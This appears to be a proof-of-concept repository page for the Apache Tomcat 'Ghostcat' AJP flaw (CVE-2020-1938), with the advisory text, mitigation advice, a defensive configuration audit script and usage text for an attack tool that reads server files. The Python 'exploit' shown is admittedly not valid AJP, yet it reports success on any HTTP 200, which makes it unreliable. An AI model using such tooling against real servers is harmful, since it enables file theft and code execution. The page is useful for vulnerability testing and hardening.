Associated Vulnerability
Title: Apache Tomcat security vulnerability (CVE-2020-1938)
Description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed:
- returning arbitrary files from anywhere in the web application
- processing any file in the web application as a JSP
Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
Description
poc-CVE-2020-1938
Readme
# About
CVE-2020-1938 (commonly known as "Ghostcat") is a critical vulnerability in the Apache Tomcat server that can lead to remote code execution (RCE). It concerns the AJP (Apache JServ Protocol) connector, which the affected releases enabled by default on all configured IP addresses. Because Tomcat treats AJP connections as more trusted than HTTP connections, an attacker who can reach the AJP port can read arbitrary files from within the web application, have any file in the web application processed as a JSP, and, if they can also place a file into the web application (for example through an upload feature), execute code on the server.
## Understanding CVE-2020-1938
- **Description**: The vulnerability exists in the way Tomcat processes AJP requests. An attacker can craft a malicious request that exploits this vulnerability, potentially leading to unauthorized access to sensitive information or execution of arbitrary code. The flaw is primarily tied to Tomcat deployments where the AJP connector is reachable from untrusted networks without adequate protections.
- **Affected Versions**: This vulnerability affects multiple versions of Apache Tomcat where the AJP connector is enabled: 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50, and 7.0.0 to 7.0.99. Users of Tomcat 7.x, 8.x, and 9.x need to be particularly vigilant.
- **Impact**: Successful exploitation can lead to severe security breaches, including unauthorized file access, data leaks, and remote code execution. As a result, it is critical for organizations to take proactive measures to mitigate this risk.
## Proof of Concept (PoC) for CVE-2020-1938
A proof of concept (PoC) is typically a demonstration of the vulnerability in action, allowing security professionals to test whether their systems are vulnerable. Here's how you can use a PoC for CVE-2020-1938.
### Prerequisites
1. **Environment Setup**:
   - A vulnerable instance of Apache Tomcat (preferably version 7.x, 8.x, or 9.x with the AJP connector enabled).
   - Access to a system where you can run Python scripts or any other scripting language that can make network requests.
2. **Networking**: Ensure that the AJP port (default 8009) is accessible from the machine running the PoC.
### Example PoC Script
Below is a simplified Python script that demonstrates how an attacker could exploit CVE-2020-1938.
```python
import requests

# Target information (placeholders to be filled in by the tester)
target_ip = "http://<TARGET_IP>:<AJP_PORT>"

# Simplified placeholder payload: ten NUL bytes, a file path and a terminator.
# Note that AJP is a binary protocol carried over raw TCP, not HTTP, so this
# simplified request is illustrative only and does not form a valid AJP message.
payload = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + b"/path/to/file" + b'\x00'

# Crafting the exploit
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Forwarded-For": "127.0.0.1",
    "User-Agent": "Mozilla/5.0"
}

# Sending the request
try:
    response = requests.post(target_ip, data=payload, headers=headers, timeout=5)
    if response.status_code == 200:
        print("Exploit successful, response:")
        print(response.text)
    else:
        print("Exploit failed, status code:", response.status_code)
except requests.RequestException as e:
    print("An error occurred:", str(e))
```
## Mitigation Strategies
1. **Configuration Changes**: Disable the AJP connector if it is not needed. If it is required, restrict access using firewall rules.
2. **Upgrade Tomcat**: Ensure you are using a version of Tomcat that is not vulnerable to CVE-2020-1938. Always apply security updates promptly.
3. **Monitoring and Logging**: Implement monitoring solutions to track unusual activity on your Tomcat servers. Log all access to the AJP connector for later analysis.
4. **Network Security**: Use network segmentation to ensure that only trusted networks can access your application servers, particularly those using AJP.
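The following added example (not part of this repository) audits a Tomcat `server.xml` for the configuration weaknesses behind CVE-2020-1938: an AJP connector bound to all interfaces and/or running without a shared secret. It assumes the `secretRequired`/`secret` connector attributes introduced in Tomcat 9.0.31, 8.5.51 and 7.0.100, and both `server.xml` fragments are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed server.xml fragment mirroring the pre-9.0.31 default:
# AJP on 8009, bound to every interface, no shared secret.
EXPOSED_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>
"""

# Constructed hardened form: loopback-only binding plus the shared secret
# that Tomcat 9.0.31 / 8.5.51 / 7.0.100 require by default (placeholder value).
HARDENED_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_LONG_RANDOM_SECRET"/>
  </Service>
</Server>
"""

WILDCARD_ADDRESSES = {"0.0.0.0", "::", "::0"}


def audit_ajp_connectors(server_xml):
    """Return a list of (port, [issues]) for every active AJP connector.

    ElementTree discards XML comments while parsing, so a connector that was
    disabled by commenting it out (the usual fix) is correctly not reported.
    """
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        # Matches both "AJP/1.3" and the org.apache.coyote.ajp.* class names.
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():
            continue
        issues = []
        address = conn.get("address")
        if address is None or address in WILDCARD_ADDRESSES:
            issues.append("bound to all interfaces (no address attribute)")
        if conn.get("secretRequired", "true").lower() == "false":
            issues.append("secretRequired explicitly disabled")
        elif not conn.get("secret"):
            issues.append("no shared secret configured")
        findings.append((conn.get("port", "?"), issues))
    return findings


def is_ghostcat_exposed(server_xml):
    """True if any AJP connector lacks the mitigations listed above."""
    return any(issues for _, issues in audit_ajp_connectors(server_xml))
```

Run `audit_ajp_connectors` over a real `server.xml` to list each AJP connector with its findings; an empty issue list means the connector is both loopback-bound and secret-protected.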
# Usage
```
usage: CVE-2020-1938.py [-h] [-p PORT] [-f FILE] target
positional arguments:
target Hostname or IP to attack
options:
-h, --help show this help message and exit
-p PORT, --port PORT AJP port to attack (default is 8009)
-f FILE, --file FILE file path on the server(default is WEB-INF/web.xml)
```
File Snapshot
[4.0K] /data/pocs/17132e0c1ef55947d73835a53b99212d7ac60a17
├── [ 16K] cve-2020-1938.py
└── [3.7K] README.md
0 directories, 2 files